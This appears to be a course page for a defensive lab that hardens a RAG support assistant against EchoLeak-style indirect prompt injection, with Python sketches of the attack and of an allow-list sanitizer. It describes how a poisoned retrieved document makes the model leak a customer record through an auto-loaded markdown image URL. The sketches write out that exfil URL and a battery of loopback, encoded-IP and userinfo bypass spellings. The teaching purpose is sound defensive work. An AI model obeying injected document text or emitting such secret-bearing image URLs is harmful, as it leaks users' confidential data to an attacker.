Defend a RAG Assistant: Block Indirect-Injection Exfil (EchoLeak)
Harden the same deliberately-vulnerable RAG assistant the offensive lab broke, in small sequential steps. Stand up the pipeline and trace one benign request, reproduce the EchoLeak markdown-image exfil, then watch a naive deny-list get bypassed by a renamed host. Build the durable fix one mechanism per step: an egress allow-list on the render sink that pins the parsed host (defeating userinfo, IP-encoded, and IPv6 spellings) and covers reference-style images, then provenance isolation so retrieved documents cannot emit instructions. Verify both controls together, resist a userinfo / IP-encoding / paraphrase bypass battery, and pass a final ship gate where attack success rate is 0 and benign quality holds.
What you'll learn
- 1. Stand up DV-RAG and trace one benign request: You own the defense of DV-RAG-Support, ACME Cloud's customer-support…
- 2. Reproduce the EchoLeak exfil baseline: Before you fix anything, reproduce the leak so you can prove your fix actually…
- 3. Watch the naive deny-list get bypassed: The on-call engineer saw the alert: an outbound GET to 127.0.0.1. They shipped…
- 4. Control 1: an egress allow-list on the render sink: Time to build the durable control. It has two mechanisms, and you build them one…
- 5. Control 2: provenance isolation (treat retrieved content as data): The egress allow-list from Step 4 closes the channel. Now close the source: stop…
- 6. Verify: exfil blocked, benign image and answers intact: Both mechanisms are now in place and carried forward in dvrag.py: the egress…
- 7. Resist bypass variants: A control that only stops the one payload you tested is the deny-list mistake all…
- 8. Ship gate: attack success rate and benign regression: This is the gate you would run in CI before shipping the fix. It expresses the…
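As a rough illustration of the Step 8 gate, the check can be reduced to two rates: attack success rate (the fraction of attack trials that leaked) and benign pass rate. The sketch below is an assumption about how such a gate might look, not the lab's actual harness; the names `rate` and `ship_gate` and the `min_benign_rate` threshold are hypothetical.

```python
def rate(outcomes: list) -> float:
    """Fraction of True outcomes. An empty suite proves nothing, so refuse it."""
    if not outcomes:
        raise ValueError("empty test suite")
    return sum(bool(o) for o in outcomes) / len(outcomes)


def ship_gate(attack_leaked: list, benign_passed: list,
              min_benign_rate: float = 1.0) -> dict:
    """Hypothetical CI gate: ship only if no attack leaked and benign quality holds.

    attack_leaked: one bool per attack trial, True if the secret was exfiltrated.
    benign_passed: one bool per benign trial, True if the answer was acceptable.
    """
    asr = rate(attack_leaked)
    benign = rate(benign_passed)
    return {
        "asr": asr,
        "benign_pass_rate": benign,
        "ship": asr == 0.0 and benign >= min_benign_rate,
    }


if __name__ == "__main__":
    # Five attack variants, none leaked; four benign questions, all answered.
    print(ship_gate([False] * 5, [True] * 4))
```

Requiring both conditions in one gate is the point: a control that blocks every image would drive attack success to 0 while failing the benign side.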
Prerequisites
- Comfortable reading and editing Python
- Know what an HTTP GET and a markdown image are
- Helpful to have seen indirect prompt injection first (the offensive counterpart lab)
This is an advanced-level AI/ML lab.
What you'll harden in this lab
This is a hands-on defensive-security lab built on a real RAG stack: a Milvus vector store, NVIDIA embeddings, and a multi-tenant knowledge base. You defend DV-RAG-Support, the same Retrieval-Augmented Generation (RAG) support assistant that the offensive Indirect Prompt Injection lab attacks. You start by reproducing the exploit so you can measure your fix against it: a poisoned document makes the assistant exfiltrate a customer's confidential account record through a markdown-image URL that the chat client auto-loads. This is the EchoLeak mechanism (CVE-2025-32711), widely reported as the first real-world zero-click exploit against a production LLM system, and it is an instance of indirect prompt injection (OWASP LLM01).
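To make the channel concrete, here is a minimal sketch of why an auto-loaded markdown image leaks data: the secret rides in the URL's query string, and the client's GET delivers it. Everything named here is an assumption for illustration (the record contents, the attacker endpoint and port, and the helper names); it does not reproduce the lab's dvrag.py.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical values, for illustration only.
ACCOUNT_RECORD = "acct=4417;plan=enterprise"
ATTACKER_URL = "http://127.0.0.1:9000/pixel.png"

# Matches inline markdown images and captures the destination URL.
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)")


def poisoned_answer(record: str) -> str:
    """What a model might emit after obeying instructions hidden in a retrieved doc."""
    return f"Your ticket is open. ![status]({ATTACKER_URL}?d={quote(record)})"


def urls_client_would_fetch(markdown: str) -> list:
    """A chat client that auto-loads images issues a GET for each of these."""
    return INLINE_IMAGE.findall(markdown)


def attacker_view(url: str) -> dict:
    """What the attacker's server can read from the request line alone."""
    return parse_qs(urlsplit(url).query)


answer = poisoned_answer(ACCOUNT_RECORD)
fetched = urls_client_would_fetch(answer)
leaked = attacker_view(fetched[0])

if __name__ == "__main__":
    print(fetched[0])
    print(leaked)
```

No click is needed: rendering the answer is enough to send the request, which is what makes the exploit zero-click.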
Then you do the engineering. You watch an obvious deny-list of the attacker's host get bypassed by another spelling of loopback, which teaches why enumerating bad destinations fails. You replace it with an egress allow-list on the render sink that names the few hosts the client may load and drops everything else, covering both inline and reference-style markdown images. You add provenance isolation so that retrieved documents are treated as untrusted data and account fields are never echoed into a link or image. You finish by verifying that a fresh battery of poisoned documents leaks nothing through any variant while benign account questions still get real, retrieval-grounded answers.
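The contrast between the two approaches can be sketched in a few lines. This is an illustrative sketch under stated assumptions, not the lab's implementation: the allowed host `static.acme.example`, the HTTPS-only rule, the bypass URLs, and all function names are hypothetical, and the regexes cover only inline and full or collapsed reference-style images (not every markdown form).

```python
import re
from urllib.parse import urlsplit

DENIED_HOSTS = {"127.0.0.1"}             # the naive deny-list
ALLOWED_HOSTS = {"static.acme.example"}  # hypothetical allow-list

INLINE_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
REF_IMAGE = re.compile(r"!\[([^\]]*)\]\[([^\]]*)\]")
REF_DEFINITION = re.compile(
    r"^[ ]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$", re.MULTILINE)


def scheme_and_host(url):
    """Parse once and trust only the parsed host, never a substring match."""
    if "\\" in url or any(c.isspace() for c in url):
        return None, None  # refuse spellings that parsers disagree on
    try:
        parts = urlsplit(url)
        return parts.scheme, parts.hostname  # hostname drops userinfo and port
    except ValueError:
        return None, None


def deny_list_ok(url):
    return scheme_and_host(url)[1] not in DENIED_HOSTS


def allow_list_ok(url):
    scheme, host = scheme_and_host(url)
    return scheme == "https" and host in ALLOWED_HOSTS


def sanitize(markdown, is_allowed=allow_list_ok):
    """Drop every image (inline or reference-style) whose host is not allowed."""
    refs = {label.lower(): url for label, url in REF_DEFINITION.findall(markdown)}

    def inline(m):
        return m.group(0) if is_allowed(m.group(2)) else "(image removed)"

    def reference(m):
        url = refs.get((m.group(2) or m.group(1)).lower())
        return m.group(0) if url and is_allowed(url) else "(image removed)"

    out = INLINE_IMAGE.sub(inline, markdown)
    out = REF_IMAGE.sub(reference, out)
    # Also delete definitions that point at disallowed hosts.
    return REF_DEFINITION.sub(
        lambda m: m.group(0) if is_allowed(m.group(2)) else "", out)


BATTERY = [
    "http://127.0.0.1/p.png?d=SECRET",                       # original payload
    "http://localhost/p.png?d=SECRET",                       # renamed host
    "http://2130706433/p.png?d=SECRET",                      # decimal-encoded IPv4
    "http://[::1]/p.png?d=SECRET",                           # IPv6 loopback
    "https://static.acme.example@127.0.0.1/p.png?d=SECRET",  # userinfo trick
]

if __name__ == "__main__":
    for url in BATTERY:
        print(f"deny-list passes={deny_list_ok(url)!s:5} "
              f"allow-list passes={allow_list_ok(url)!s:5} {url}")
```

In this sketch the deny-list stops only the spellings it happens to name, while the allow-list rejects the whole battery because none of the parsed hosts is on the list. The userinfo case shows why the check must use the parsed host: the allowed name appears in the URL text, but the request would go to 127.0.0.1.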